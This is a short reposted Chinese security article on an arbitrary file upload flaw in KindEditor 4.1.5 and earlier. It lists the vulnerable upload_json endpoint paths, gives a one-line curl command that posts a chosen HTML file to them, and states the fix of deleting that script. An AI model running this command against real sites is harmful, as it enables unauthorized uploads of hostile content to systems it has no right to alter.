kindeditor<=4.1.5 文件上傳漏洞利用

本文轉載自查看原文 2019-03-22 02:48 2832 漏洞檔案/ 滲透測試/ 網絡安全/ 漏洞利用

kindeditor<=4.1.5 文件上傳漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use

　　漏洞存影響版本：小於等於4.1.5的kindeditor 編輯器

　　漏洞影響：上傳任意. txt 和. html 文件

　　漏洞存在動態腳本語言： php/asp/jsp/asp.net

　　漏洞存在的證明文件：upload_json.* 具體路徑如下：

　　/kindeditor/asp/upload_json.asp

　　/kindeditor/asp.net/upload_json.ashx

　　/kindeditor/jsp/upload_json.jsp

　　/kindeditor/php/upload_json.php

利用方式：

curl -F "imgFile=@1.html" http://url/kindeditor/asp/upload_json.asp?dir=file

1.html為想要上傳的文件

在返回中得到上傳后的路徑，然后訪問

修復

刪除upload_json.asp即可。

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 kindeditor<=4.1.5上傳漏洞復現文件上傳漏洞與利用文件上傳漏洞的介紹及利用 SpringBoot之KindEditor文件上傳 vulhub Nginx文件解析漏洞復現——利用文件上傳漏洞上傳惡意后門 KindEditor文件上傳成功前端顯示上傳失敗文件包含漏洞利用 EasyAdmin上傳文件漏洞 WEB漏洞——文件上傳文件上傳漏洞